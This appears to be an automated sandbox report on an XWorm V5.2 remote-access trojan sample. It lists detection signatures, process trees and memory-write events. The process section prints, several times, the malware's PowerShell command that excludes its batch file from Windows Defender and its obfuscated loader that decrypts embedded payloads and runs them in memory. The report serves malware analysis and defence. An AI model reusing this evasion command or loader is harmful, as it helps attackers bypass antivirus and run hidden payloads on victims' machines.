Malware Analysis Report

2024-11-15 08:36

Sample ID 240905-af3h1szfme
Target XWorm V5.2.exe
SHA256 c39cc9aaa0311fd1f6d981e995b608b0d36e464aea09896bd17b41bbd3fc1fe6
Tags
execution xworm agilenet persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c39cc9aaa0311fd1f6d981e995b608b0d36e464aea09896bd17b41bbd3fc1fe6

Threat Level: Known bad

The file XWorm V5.2.exe was found to be: Known bad.

Malicious Activity Summary

execution xworm agilenet persistence rat trojan

Suspicious use of NtCreateUserProcessOtherParentProcess

Xworm

Detect Xworm Payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Deletes itself

Obfuscated with Agile.Net obfuscator

Executes dropped EXE

Drops startup file

Loads dropped DLL

Checks computer location settings

Adds Run key to start application

Looks up external IP address via web service

Drops file in System32 directory

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

Modifies data under HKEY_USERS

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-05 00:10

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-05 00:10

Reported

2024-09-05 00:20

Platform

win7-20240704-en

Max time kernel

359s

Max time network

360s

Command Line

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2820 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
PID 2820 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
PID 2820 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
PID 2820 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2820 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2820 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2820 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\system32\cmd.exe
PID 2820 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\system32\cmd.exe
PID 2820 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\system32\cmd.exe
PID 2596 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
PID 2596 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
PID 2596 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
PID 2596 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2596 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2596 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2664 wrote to memory of 2292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2664 wrote to memory of 2292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2664 wrote to memory of 2292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2664 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2664 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2664 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2596 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\system32\cmd.exe
PID 2596 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\system32\cmd.exe
PID 2596 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\system32\cmd.exe
PID 2112 wrote to memory of 2900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2112 wrote to memory of 2900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2112 wrote to memory of 2900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2112 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2604 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
PID 2604 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
PID 2604 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
PID 2604 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2604 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2604 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2604 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\system32\cmd.exe
PID 2604 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\system32\cmd.exe
PID 2604 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\system32\cmd.exe
PID 2056 wrote to memory of 1632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2056 wrote to memory of 1632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2056 wrote to memory of 1632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2056 wrote to memory of 1280 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 1280 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 1280 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1120 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
PID 1120 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
PID 1120 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
PID 1120 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1120 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1120 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1120 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\system32\cmd.exe
PID 1288 wrote to memory of 1716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1288 wrote to memory of 1716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1288 wrote to memory of 1716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1288 wrote to memory of 868 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 868 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 868 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
PID 2488 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
PID 2488 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
PID 2488 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

